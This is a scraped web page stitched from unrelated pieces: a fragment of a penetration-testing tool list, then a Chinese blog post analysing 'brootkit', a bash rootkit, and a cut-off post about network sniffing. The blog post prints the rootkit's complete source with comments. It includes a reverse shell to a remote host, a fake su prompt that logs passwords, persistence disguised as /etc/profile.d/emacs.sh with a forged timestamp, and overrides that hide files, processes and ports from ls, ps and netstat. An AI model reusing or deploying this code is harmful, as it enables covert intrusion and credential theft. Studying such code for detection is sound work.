  • Nikto - Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6700 potentially dangerous files/programs, checks for outdated versions of over 1250 servers, and version specific problems on over 270 servers. 
    Author: Cirt.net 
    License: GPLv3
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $nikto

  • PadBuster - Automated script for performing Padding Oracle attacks. 
    Author: Brian Holyfield, Gotham Digital Science 
    License: Reciprocal Public License 1.5
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $padbuster

  • SqlMap - sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. 
    Author: Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar 
    License: GPLv2
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $sqlmap

  • Vega - Vega is a free and open source scanner and testing platform to test the security of web applications. Vega can help you find and validate SQL Injection, Cross-Site Scripting (XSS), inadvertently disclosed sensitive information, and other vulnerabilities. It is written in Java, GUI based, and runs on Linux, OS X, and Windows. 
    Author: Subgraph 
    License: Eclipse Public License 1.0
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $vega

  • Wpscan - WPScan is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues. 
    Author: The WPScan Team 
    License: WPScan Public Source License
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $wpscan

  • OWASP Xenotix XSS Exploit FrameWork - OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. Xenotix provides Zero False Positive XSS Detection by performing the Scan within the browser engines where in real world, payloads get reflected. Xenotix Scanner Module is incorporated with 3 intelligent fuzzers to reduce the scan time and produce better results. If you really don't like the tool logic, then leverage the power of Xenotix API to make the tool work like you wanted it to be. It is claimed to have the world’s 2nd largest XSS Payloads of about 4800+ distinctive XSS Payloads. It is incorporated with a feature rich Information Gathering module for target Reconnaissance. The Exploit Framework includes real world offensive XSS exploitation modules for Penetration Testing and Proof of Concept creation. Say no to alert pop-ups in PoC. Pen testers can now create appealing Proof of Concepts within few clicks. 
    Author: Ajin Abraham 
    License: Creative Commons Attribution-ShareAlike 3.0
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $xenotix

  • Yasuo - Yasuo is a ruby script that scans for vulnerable 3rd-party web applications. While working on a network security assessment (internal, external, redteam gigs etc.), we often come across vulnerable 3rd-party web applications or web front-ends that allow us to compromise the remote server by exploiting publicly known vulnerabilities. Some of the common & favorite applications are Apache Tomcat administrative interface, JBoss jmx-console, Hudson Jenkins and so on. 
    License: GPLv3
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $yasuo

  • Zaproxy - The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox. 
    Author: OWASP.org

    There is some integration issue with Zaproxy and PentestBox. So you have to start it manually by opening zap.bat file inPentestBox_Directory/bin/WebApplications/ZAP_2.4.0/.We will surely try to fix it sooner.

Web Applications Proxies

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: Portswigger
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $burp

  • Zaproxy - The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications. It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing as well as being a useful addition to an experienced pen testers toolbox. 
    Author: OWASP.org

    There is some integration issue with Zaproxy and PentestBox. So you have to start it manually by opening zap.bat file inPentestBox_Directory/bin/WebApplications/ZAP_2.4.0/.We will surely try to fix it sooner.

Web Crawlers

  • Dir Buster - DirBuster is a multi threaded java application designed to brute force directories and files names on web/application servers. 
    Author: OWASP.org 
    License: Apache 2.0
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $dirbuster

  • Burp Suite - Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities. 
    Author: Portswigger
      cmd.exe

    C:\Users\Aditya Agrawal\Desktop

    $burp

关于文字会重叠的问题。提供方式

 

brootkit: 一个shell脚本写的后门

发布时间:June 7, 2015 // 分类:工作日志,运维工作,linux,代码学习,转帖文章 // 1 Comment

今晚在吃饭呢, XX给我发来一条消息, 让我看看brootkit, 看看这个东西的兼容性怎样. 然后我把每个文件观察了一下, 发现它最核心的功能就是一个反弹shell, 利用了bash的可以创建tcp连接的特性. 其它的脚本除了brootkit.sh之外, 基本就是为了更加适合小白去使用而写的, 不过brootkit.sh的主要功能就是根据rootkit的配置文件隐藏这一整套的脚本和配置文件. 兼容性不怎样, 因为很可能没有bash这个程序.

打开连接看了一下描述, 是这样的, 它是一个bash脚本写的rootkit工具.

它可以做这些事情

more hidable ability against admintrator or hids.
su passwd thief.
hide file and directorys.
hide process.
hide network connections.
connect backdoor.
muilt thread port scanner.
http download.
好吧, 先checkout出来

MacOS:tmp cc$ svn co https://github.com/cloudsec/brootkit
A    brootkit/branches
A    brootkit/trunk
A    brootkit/trunk/.bdrc
A    brootkit/trunk/README
A    brootkit/trunk/README.md
A    brootkit/trunk/bashbd.sh
A    brootkit/trunk/br.conf
A    brootkit/trunk/br_config.sh
A    brootkit/trunk/brdaemon.sh
A    brootkit/trunk/brget.sh
A    brootkit/trunk/brootkit.sh
A    brootkit/trunk/brscan.sh
A    brootkit/trunk/install.sh
A    brootkit/trunk/uninstall.sh
Checked out revision 35.
MacOS:tmp cc$

可以看到, 有一个配置文件, 还有8个sh脚本, 根据README的描述, 应该是bash脚本

一个个脚本来看, 首先看bashbd.sh, 我给加上注释了

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

. $BR_ROOTKIT_PATH/br_config.sh

function br_connect_backdoor()
{
    local target_ip=$br_remote_host
    local target_port=$br_remote_port
    local sleep_time=$br_sleep_time

    while [ 1 ]
    do  
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
        {
        PS1='[\A j\j \u@\h:t\l \w]\$';export PS1
        exec 9<> /dev/tcp/$target_ip/$target_port # 这一步需要bash支持, 就是把9号文件描述符打开并重定向到某个ip的某个端口.
        [ $? -ne 0 ] && exit 0 || exec 0<&9;exec 1>&9 2>&1 # 检查文件描述符是否打开成功, 如果失败则退出, 否则把当前shell的标准输入和标准输出以及出错重定向到文件描述符
        if type python >/dev/null;then # 如果有python则用python去调用bash获取反弹shell
            export MAX_ROW_NUM MAX_COL_NUM
            python -c 'import pty; pty.spawn("/bin/bash")'
        else
            /bin/bash --rcfile $BR_ROOTKIT_PATH/.bdrc --noprofile -i # 如果没有python就执行bash, 其实这里是执行任意shell都可以的
        fi
        }&
        wait

        sleep $((RANDOM%sleep_time+sleep_time))
    done
}

br_load_config $BR_ROOTKIT_PATH/br.conf
br_connect_backdoor

从man手册可以知道那个rcfile选项的意思是这样的

--rcfile file
Execute commands from file instead of the standard personal initialization file ~/.bashrc if the shell is interactive (see INVOCATION below).

而那个.bdrc文件只是打印一个欢迎字符串而已

#!/bin/bash

echo -e "\033[31m\t\t\t\twelcome to brootkit\033[0m\033[32m"

br.conf里面定义了一些需要隐藏的文件和进程, 还有反弹shell的目标ip和端口

#brootkit config file.
#
HIDE_PORT       8080,8899
HIDE_FILE       br.conf,bashbd.sh,brootkit,.bdrc,brdaemon
HIDE_PROC       bashbd,brootkit,pty.spawn,brdaemon
REMOTE_HOST     localhost
REMOTE_PORT     8080
SLEEP_TIME      60

看一下br_config.sh, 它定义了3个函数, 以及许多数组变量, 用来载入和显示配置文件的参数的

#!/bin/bash

declare -a br_hide_port
declare -a br_hide_file
declare -a br_hide_proc
declare -a br_remote_host
declare -a br_remote_port
declare br_sleep_time

function br_load_config()
{
        local arg1 arg2 line

        while read line
        do
                [ "${line:0:1}" == "#" -a -z "$line" ] && continue

                arg1=`echo $line | cut -d " " -f 1`
                arg2=`echo $line | cut -d " " -f 2`

                case $arg1 in
                        "HIDE_PORT")
                                br_hide_port=$arg2;;
                        "HIDE_FILE")
                                br_hide_file=$arg2;;
                        "HIDE_PROC")
                                br_hide_proc=$arg2;;
                        "REMOTE_HOST")
                                br_remote_host=$arg2;;
                        "REMOTE_PORT")
                                br_remote_port=$arg2;;
                        "SLEEP_TIME")
                                br_sleep_time=$arg2;;
                esac
        done < $1
}

function display_array()
{
    declare -a arg_tmp=$1
    local arg old_ifs

    old_ifs=$IFS; IFS=","
    for arg in ${arg_tmp[@]}
    do
        echo $arg
    done
    IFS=$old_ifs
}

function br_display_config()
{
        echo -e "HIDE_PORT:"
    display_array $br_hide_port
        echo -e "HIDE_FILE:"
    display_array $br_hide_file
        echo -e "HIDE_PROC:"
    display_array $br_hide_proc
        echo -e "REMOTE_HOST:"
    display_array $br_remote_host
        echo -e "REMOTE_PORT:"
    display_array $br_remote_port
        echo -e "SLEEP_TIME:"
    echo $br_sleep_time
}

根据man手册, declare -a的意思是声明一个数组

An array is created automatically if any variable is assigned to using
the syntax name[subscript]=value. The subscript is treated as an
arithmetic expression that must evaluate to a number greater than or
equal to zero. To explicitly declare an array, use declare -a name
(see SHELL BUILTIN COMMANDS below). declare -a name[subscript] is also
accepted; the subscript is ignored. Attributes may be specified for an
array variable using the declare and readonly builtins. Each attribute
applies to all members of an array.

这是brget.sh的内容, 用bash些的一个发送get请求的脚本, 用到了bash的特性, 就是发起tcp连接并且打开文件描述符连接到这个tcp连接

#!/bin/bash

declare remote_host
declare remote_port
declare remote_file
declare remote_file_len

function sock_read()
{
    local line tmp

    read -u 9 -t 5 line
    if ! echo $line|grep -e "200 OK" >/dev/null; then
        echo $line
        rm -f $remote_file
        socket_close
        exit
    else
        echo "response 200 ok."
    fi

    while read -u 9 -t 5 line
    do
        if [ ${#line} -eq 1 ]; then
            break
        fi

        tmp=`echo $line|cut -d " " -f 1`
        if [ "$tmp" == "Content-Length:" ]; then
            remote_file_len=`echo $line|cut -d " " -f 2`
        fi
    done

    echo "length: $remote_file_len"
    while read -u 9 -t 5 line
    do
        echo -e "$line" >>$remote_file
    done
}

function sock_write()
{
    local buf

    buf="GET /$3 http/1.0\r\nHost: $1:$2\r\n"
    echo -e $buf >&9
    [ $? -eq 0 ] && echo "send http request ok." || echo "send http request failed."
}

function socket_create()
{
    exec 9<> /dev/tcp/$1/$2
    [ $? -eq 0 ] && echo "connect to $1:$2 ok." || echo "connect to $1:$2 failed."
}

function socket_close()
{
    exec >&9-
    [ $? -ne 0 ] && echo "close socket failed."
}

function parse_url()
{
    local url=$1

    url=${url#http://}
    remote_file=${url#*/}
    remote_host=`echo $url | awk -F '/' '{print $1}'`
    remote_port=`echo $remote_host | awk -F ':' '{print $2}'`
    remote_host=`echo $remote_host | awk -F ':' '{print $1}'`

    [ "$remote_port" == "" ] && remote_port=80
}

function file_init()
{
    [ -f $remote_file ] && rm -f $remote_file || touch $remote_file
}

function display_start()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="--$tmp-- $1"
    echo -e $tmp
}

function display_finsh()
{
    local tmp

    tmp=`date +'%F %T'` 
    tmp="\n--$tmp-- - $remote_file saved $remote_file_len"
    echo -e "$tmp"
}

function wget_usage()
{
    echo -e "$0 <url>\n"
    echo "exp:"
    echo "$0 http://www.baidu.com/index.html"
    echo "$0 http://www.baidu.com:80/index.html"
}

function main()
{
    if [ $# -eq 0 ]; then
        wget_usage $1
        exit
    fi

    parse_url $@

    file_init
    display_start $1
    socket_create $remote_host $remote_port
    sock_write $remote_host $remote_port $remote_file
    sock_read
    display_finsh
    socket_close
}

main $@

用起来就像这样

MacOS:trunk cc$ bash brget.sh http://g.cn
--2015-01-20 22:33:20-- http://g.cn
connect to g.cn:80 ok.
send http request ok.
HTTP/1.0 400 Bad Request
MacOS:trunk cc$

brscan.sh, 看名字就知道了, 是一个端口扫描的东西, 看代码, 也用到了bash的发起tcp连接的特性

#!/bin/bash

declare br_remote_host="localhost"
declare -a br_ports
declare -a br_open_ports
declare br_port_num=0
declare br_curr_port_num=0
declare br_open_port_num=0
declare br_thread_num=0
declare br_timeout=2
declare br_logfile="brscan.log"
declare total_run_time
declare max_row_num

declare -a playx=('/' '|' '\\' '-')
declare playx_len=4

declare max_col_num=64
declare base_row=0
declare base_col=1
declare cur_col=2
declare total_port=10
declare cur_port=0

function br_run_play()
{
        local i x y tmp_col

        tmp_col=$((br_curr_port_num * max_col_num / br_port_num))

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        for ((i = 1; i < $tmp_col; i++))
        do
                y=$((base_col+i))
                [ $y -gt $max_col_num ] && break
                echo -ne "\033[${x};${y}H>\033[?25l"
        done
}

function br_play_init()
{
        local x y i

        i=$((max_row_num+1))
        [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

        echo -ne "\033[${x};${base_col}H\033[33m[\033[0m"

        y=$((max_col_num+1))
        echo -ne "\033[${x};${y}H\033[33m]\033[0m"
}

function compute_run_time()
{
        local day hour min rtime

        day=$(($1/3600/24))
        hour=$(($1/3600))
        min=$(($1/60))

        if [ $min -eq 0 ]; then
                sec=$(($1%60))
        total_run_time="$sec s"
        else
                if [ $hour -eq 0 ]; then
                        sec=$(($1%60))
                        total_run_time="$min m $sec s"
                else
                        if [ $day -eq 0 ]; then
                                tmp=$(($1%3600))
                                min=$(($tmp/60))
                                sec=$(($tmp%60))
                                total_run_time="$hour h $min m $sec s"
                        else
                                # 86400 = 3600 * 24
                                tmp=$(($1%86400))
                                hour=$(($tmp/3600))
                                tmp1=$(($tmp%3600))
                                min=$(($tmp1/60))
                                sec=$(($tmp1%60))
                                total_run_time="$day d $hour h $min m $sec s"
                        fi


                fi
        fi
}

function get_run_time()
{
        local run_count local_hz run_time
    local start_time curr_time

    if [ -d "/proc/$1" ]; then
            run_count=`cat /proc/$1/stat | cut -d " " -f 22`
    else
        return 0
    fi

        local_hz=`getconf CLK_TCK`
        start_time=$(($run_count/$local_hz))

        curr_time=`cat /proc/uptime | cut -d " " -f 1 | cut -d "." -f 1`
        run_time=$((curr_time-start_time))

    return $run_time
}

function br_show_open_ports()
{
    local x y i

    get_run_time $$
    run_time=$?

    compute_run_time $run_time

    i=$((max_row_num+1))
    [ $br_thread_num -gt $i ] && x=$i || x=$((br_thread_num+4))

    y=$((max_col_num+3))
    printf "\033[${x};${y}H\033[32;1m %5d/%-5d\t$total_run_time\033[0m" \
        $br_curr_port_num $br_port_num

    x=$((x+2)); y=1
    printf "\033[${x};${y}H\033[32;1m%s: ${br_open_ports[*]}\033[0m" \
        $br_remote_host 
}

# $1 => remote host
# $2 => remote port
# $3 => thread_num
function thread_scan()
{
    local tport pid pidfile sock_fd
    local i j k m=0 run_time x

    mkdir -p .scan

    for ((i = 0; i < $3; i++))
    do
        {
        let "sock_fd=$2+$i"
        let "j=$2+$i+3"
        /bin/bash -c "exec $j<> /dev/tcp/$1/${br_ports[$sock_fd]}" 2>${br_ports[$sock_fd]}
        }&
        let "k=$2+$i"
        x=$((m+3))
        if [ $x -ge $max_row_num ]; then
             m=0;x=3
        else
            ((m++))
        fi
        printf "\033[${x};1H\033[33mthread<%-5d>\t\t--\t\tpid <%-5d>\t-->\t%-5d\033[?25l" \
            $i $! ${br_ports[$k]}
        echo ${br_ports[$k]} > ".scan/$!"
        [ $br_curr_port_num -ge $br_port_num ] && break || ((br_curr_port_num++))
    done

    sleep $br_timeout

    exec 2>&-
        for pid in `jobs -p`
        do
        get_run_time $pid
        run_time=$?
        [ $run_time -eq 0 ] && continue

                if [ $run_time -ge $br_timeout ]; then
                        kill -9 $pid >/dev/null 2>&1
            rm -f ".scan/$pid"
                fi
        done

    for ((i = 0; i < $3; i++))
    do
        let "sock_fd=$2+$i"
                if [ ! -s ${br_ports[$sock_fd]} ]; then
            for pid_file in `ls .scan`
            do
                tport=`cat ".scan/$pid_file"`
                if [ $tport -eq ${br_ports[$sock_fd]} ]; then
                    br_open_ports[$br_open_port_num]=${br_ports[$sock_fd]}
                    ((br_open_port_num++))
                fi
            done
                fi

        rm -f ${br_ports[$sock_fd]}
    done

    br_run_play
    br_show_open_ports
    rm -fr .scan
}

# $1 => remote host
# $2 => thread_num
function br_scan_port()
{
    local i

    for ((i = 0; i < $br_port_num; i+=$br_thread_num))
    do
        thread_scan $br_remote_host $i $br_thread_num
    done
}

function br_show_ports()
{
    local i

    for ((i = 0; i < $br_port_num; i++))
    do
        echo ${br_ports[$i]}
    done
}

function parse_port()
{
    local start_port end_port port

    start_port=`echo $1 | cut -d "-" -f 1`
    end_port=`echo $1 | cut -d "-" -f 2`

    for ((port=$start_port; port <= $end_port; port++))
    do
        br_ports[$br_port_num]=$port
        ((br_port_num++))
    done
    ((br_port_num--))
}

function br_parse_port()
{
    declare -a ports
    local tmp_ifs port

    tmp_ifs=$IFS; IFS=','; ports=$1

    for port in ${ports[@]}
    do
        if echo $port|grep -e ".*-.*" >/dev/null; then
            parse_port $port
        else
            br_ports[$br_port_num]=$port
            ((br_port_num++))
        fi
    done
    IFS=$tmp_ifs
}

function br_show_arg()
{
    echo -ne "\033[1;1H"
    echo -ne "\033[31;1mhost: $br_remote_host | total ports: $br_port_num | thread num: $br_thread_num "
    echo -e "timeout: $br_timeout | logfile: $br_logfile\n\033[0m"
}

function br_scan_init()
{
    echo -ne "\033[2J"
        MAX_ROW_NUM=`stty size|cut -d " " -f 1`
        MAX_COL_NUM=`stty size|cut -d " " -f 2`
    max_row_num=$((MAX_ROW_NUM-5))
}

function br_scan_exit()
{
    echo -e "\033[?25h"
}

function br_usage()
{
    echo -e "$1 <-p> [-n|-t|-o|-h] <remote_host>\n"
    echo -e "option:"
    echo -e "-p\t\tports, pattern: port1,port2,port3-port7,portn..."
    echo -e "-n\t\tthread num, defalut is 10"
    echo -e "-t\t\ttimeout, default is 30s"
    echo -e "-o\t\tresults write into log file, default is brscan.log"
    echo -e "-h\t\thelp information."
    echo -e "\nexp:"
    echo -e "$1 -p 21,22,23-25,80,135-139,8080 -t 20 www.cloud-sec.org"
    echo -e "$1 -p 1-65525 -n 200 -t 20 www.cloud-sec.org"
}

function main()
{
    if [ $# -eq 0 ]; then
        br_usage $0
        exit 0
    fi

    while getopts "p:n:t:o:h" arg
    do
    case $arg in
        p)
            br_parse_port $OPTARG ;;
        n)
            br_thread_num=$OPTARG ;;
        t)
            br_timeout=$OPTARG ;;
        o)
            br_logfile=$OPTARG ;;
        h)
            br_usage $0
            exit 0
            ;;
        ?)
            echo "unkown arguments."
            exit 1
            ;;
        esac
    done

    shift $((OPTIND-1))
    br_remote_host=$@

    [ $br_port_num -lt $br_thread_num ] && br_thread_num=$br_port_num

    #br_show_ports
    br_scan_init
    br_play_init
    br_show_arg
    br_scan_port
    br_scan_exit
}

main $@

brdaemon.sh是一个把bashbd.sh放后台执行的一个脚本

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_hookhup()
{
        :
}

function br_daemon()
{
    if ! type nohup >/dev/null; then
                nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
                [ $? -eq 1 ] && exit
        else
                trap br_hookhup SIGHUP
                $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
                [ $? -eq 1 ] && exit
        fi
}

br_daemon

install.sh脚本就是

#!/bin/bash

BR_ROOTKIT_PATH="/usr/include/..."

function br_rootkit()
{
    cp brootkit.sh /etc/profile.d/emacs.sh # 把rootkit脚本拷贝到指定目录, 每次打开一个登录shell的时候都会执行这个脚本
    touch -r /etc/profile.d/vim.sh /etc/profile.d/emacs.sh # 用vim.sh的时间戳来修饰emacs.sh
}

function br_hookhup()
{
    :
}

function main()
{
    mkdir -p $BR_ROOTKIT_PATH -m 0777 # 创建文件夹来存放所有文件
    [ $? -eq 1 ] && exit && echo "mkdir $BR_ROOTKIT_PATH failed."

    cp brootkit.sh br.conf br_config.sh bashbd.sh brscan.sh $BR_ROOTKIT_PATH
    [ $? -eq 1 ] && exit && echo "copy brootkit failed."

    cp brdaemon.sh /etc/rc.d/init.d/brdaemon # 复制控制脚本到系统存放控制脚本的目录
    ln -s /etc/rc.d/init.d/brdaemon /etc/rc.d/rc3.d/S10brdaemon # 在运行级别3的话就启动脚本, 适用Red Hat系列Linux
    [ $? -eq 1 ] && exit && echo "copy brdaemon failed."

    chmod 777 $BR_ROOTKIT_PATH

    if ! type nohup >/dev/null; then
        nohup $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    else
        trap br_hookhup SIGHUP
        $BR_ROOTKIT_PATH/bashbd.sh > /dev/null 2>&1 &
        [ $? -eq 1 ] && exit && echo "install backdoor failed."
    fi

    br_rootkit
    [ $? -eq 1 ] && exit && echo "install brootkit failed." || \
        echo "install brootkit successful."
}

main

根据man手册, touch -r的意思如下

-r Use the access and modifications times from the specified file instead of the current time of day.
好了, 到了最后一个脚本, 这个脚本的主要功能就是, 每次用户登录的时候就执行, 它会替换系统命令, 根据配置文件把相关的文件给隐藏掉, 就是这样

#!/bin/bash
# Lightweight rootkit implemented by bash shell scripts v0.01
#
# by wzt 2015   http://www.cloud-sec.org
#

declare -r builtin
declare -r declare
declare -r set
declare -r fake_unset
declare -r type
declare -r typeset

unalias ls >/dev/null 2>&1

BR_ROOTKIT_PATH="/usr/include/..."

function abcdmagic()
{
    :
}

function builtin()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "declare"|"set"|"unset"|"command"|"type"|"typeset")
            fake_a="$(command builtin $1 $2)"
            if [ $2 == " " ];then
                fake_b=${fake_a/br_hide_file\=*/}
            else
                fake_b=${fake_a/\/bin\/ls?()*/}
            fi
            echo -n "$fake_b"
            reset_command
            return ;;
        "builtin")
            echo "bash: builtin: builtin: syntax error, bash($BASH_VERSION) is not support."
            reset_command
            return ;;
        *)
            command builtin $1 $2
            reset_command
            ;;
    esac
}

function declare()
{
    local fake_a fake_b

    unset command
    case $1 in 
        "")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/\/bin\/ls?()*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command declare $1 $2
            reset_command
            return ;;
    esac
}

function typeset()
{
    local fake_a fake_b

    unset command
    case $1 in
        ""|"-f"|"-F")
            fake_a="$(command declare $1 $2)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        *)
            command typeset $1 $2
            reset_command
            return ;;
    esac
}

function type()
{
    case $1 in
        "builtin"|"declare"|"set"|"unset"|"type"|"typeset")
            echo "$1 is a shell builtin"
            return ;;
        "dir")
            echo "dir is /usr/bin/dir"
            return ;;
        "ls")
            echo "ls is aliased to ls --color=tty"
            return ;;
        "ps")
            echo "ps is /bin/ps"
            return ;;
        "netstat")
            echo "netstat is hashed (/bin/netstat)"
            return ;;
        "/bin/ls"|"/usr/bin/dir"|"/bin/ps"|"/bin/netstat")
            echo "$1 is $1"
            return ;;
        *)
            unset command
            command type $1 $2
            reset_command
            return ;;
    esac
}

function set()
{
    local fake_a fake_b

    unset command
    case $1 in
        "")
            fake_a="$(command set)"
            fake_b=${fake_a/br_hide_file\=*/}
            echo -n "$fake_b"
            reset_command
            return ;;
        "-x"|"+x")
            return ;;
        *)
            echo $1 $2
            command set $1 $2
            reset_command
            return ;;
    esac
}

function fake_unset()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset $1 $2
            return ;;
    esac
}

function fake_command()
{
    case $1 in
        "builtin"|"declare"|"command"|"set"|"unset"|"type"|"typeset")
            echo "bash: syntax error, bash($BASH_VERSION) is not support."
            return ;;
        *)
            unset command
            command $1 $2
            reset_command
            return ;;
    esac
}

function command()
{
    case $1 in
        "builtin")
            builtin $2 $3
            return ;;
        "declare")
            declare $2 $3
            return ;;
        "set")
            set $2 $3
            return ;;
        "unset")
            fake_unset $2 $3
            . brootkit.sh
            return ;;
        "type")
            type $2 $3
            return ;;
        "typeset")
            typeset $2 $3
            return ;;
        "command")
            fake_command $2 $3
            return ;;
        *)
            unset command
            command $2 $3
            . brootkit.sh
            return ;;
    esac
}

function reset_command()
{
    function command()
    {
        case $1 in
            "builtin")
                builtin $2 $3
                return ;;
            "declare")
                declare $2 $3
                return ;;
            "set")
                set $2 $3
                return ;;
            "unset")
                fake_unset $2 $3
                . brootkit.sh
                return ;;
            "type")
                type $2 $3
                return ;;
            "typeset")
                typeset $2 $3
                return ;;
            "command")
                fake_command $2 $3
                return ;;
            *)
                unset command
                command $2 $3
                . brootkit.sh
                return ;;
        esac
    }
}

function su()
{
    local arg_list=("" "-" "-l" "--login"
            "-c" "--command" "--session-command"
            "-f" "--fast"
            "-m" "--preserve-environment" "-p"
            "-s" "--shell=SHELL")
    local flag=0 tmp_arg arg pass

    if [ $UID -eq 0 ]; then
        /bin/su $1; unset su ; return $?
    fi

    for arg in ${arg_list[@]}
    do
        [ "$1" = "$arg" ] && flag=1
    done

    [ $# -eq 0 ] && flag=1

    tmp_arg=$1;tmp_arg=${tmp_arg:0:1};
    [ "$tmp_arg" != "-" -a $flag -eq 0 ] && flag=1

    if [ $flag -ne 1 ];then
        /bin/su $1; return $?
    fi

    [ ! -f /tmp/... ] && `touch /tmp/... && chmod 777 /tmp/... >/dev/null 2>&1`

    echo -ne "Password:\r\033[?25l"
    read -t 30 -s pass
    echo -ne "\033[K\033[?25h"

    /bin/su && unset su && echo $pass >> /tmp/...
}

unalias ls >/dev/null 2>&1

function max_file_length()
{
    local tmp_file sum=0 n=0

    for tmp_file in `/bin/ls $@`
    do
        n=${#tmp_file}
        [ $n -gt $sum ] && sum=$n
    done

    return $sum
}

function ls()
{
    local fake_file max_col_num file_format
    local hide_file hide_flag file_arg old_ifs
    local file_len=0 sum=0 n=0 display_mode=0

    max_col_num=`stty size|cut -d " " -f 2`

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    for file_arg in $@
    do
        if echo $file_arg|grep -q -e "^-.*l.*"; then
            display_mode=1; break
        fi
    done

    case $display_mode in
    0)
        unset -f /bin/ls
        max_file_length $@
        file_len=$?

        for fake_file in $(/bin/ls $@)
        do
            hide_flag=0
            old_ifs=$IFS; IFS=","
            for hide_file in ${br_hide_file[@]}
            do
                if echo "$fake_file"|grep -e "^$hide_file" >/dev/null;then
                    hide_flag=1; break
                fi
            done
                IFS=$old_ifs

            [ $hide_flag -eq  1 ] && continue

            n=${#fake_file}
            ((sum=sum+n+file_len))

            if [ $sum -gt $max_col_num ];then
                file_format="%-$file_len""s\n"
                printf $file_format $fake_file
                sum=0
            else
                file_format="%-$file_len""s "
                printf $file_format $fake_file
            fi
        done

        [ $sum -le $max_col_num ] && echo ""
        reset_ls
        return ;;
    1)  
        unset -f /bin/ls

        fake_file=`/bin/ls $@`
        old_ifs=$IFS; IFS=","
        for hide_file in ${br_hide_file[@]}
        do
            fake_file=`echo "$fake_file" | sed -e '/'$hide_file'/d'`
        done
        IFS=$old_ifs
        echo "$fake_file"
        reset_ls

        return ;;
    esac
}

function dir()
{
    ls $@
}

function /usr/bin/dir()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function reset_ls()
{
    function /bin/ls()
    {
        unset -f /bin/ls
        ls $@
        reset_ls
    }
}

function /bin/ls()
{
    unset -f /bin/ls
    ls $@
    reset_ls
}

function ps()
{
    local proc_name hide_proc old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","

    proc_name=`/bin/ps $@`
    for hide_proc in ${br_hide_proc[@]}
    do
        proc_name=`echo "$proc_name" | sed -e '/'$hide_proc'/d'`
    done

    echo "$proc_name"
    IFS=$old_ifs
}

function reset_ps()
{
    function /bin/ps()
    {
        unset -f /bin/ps
        ps $@
        reset_ps
    }
}

function /bin/ps()
{
    unset -f /bin/ps
    ps $@
    reset_ps
}

function netstat()
{
    local hide_port tmp_port old_ifs

    . $BR_ROOTKIT_PATH/br_config.sh
    br_load_config $BR_ROOTKIT_PATH/br.conf

    old_ifs=$IFS; IFS=","
    tmp_port=`/bin/netstat $@`
    for hide_port in ${br_hide_port[@]}
    do
        tmp_port=`echo "$tmp_port" | sed -e '/'$hide_port'/d'`
    done
    echo "$tmp_port"
    IFS=$old_ifs
}

function reset_netstat()
{
    function /bin/netstat()
    {
        unset -f /bin/netstat
        netstat $@
        reset_netstat
    }
}

function /bin/netstat()
{
    unset -f /bin/netstat
    netstat $@
    reset_netstat
}

 

嗅探的一些记录

发布时间:June 3, 2015 // 分类:转帖文章,windows // No Comments

解决cain 嗅探导致卡死

嗅探的时候服务器卡死 然后登录都无法登陆 想必大家经常遇到
这个问题很多人都在交流 网上流传的脚本思路是 
先设置 cain 重启后接着嗅探
如果 访问某个ip 超时 就重启
重启动静太大了,结束进程 方式比较合理
写了个批处理 
遇到网络卡了 自动退出 
网络状态好了 再自动开启

欢迎修改 以及更好的建议

@echo off
:top
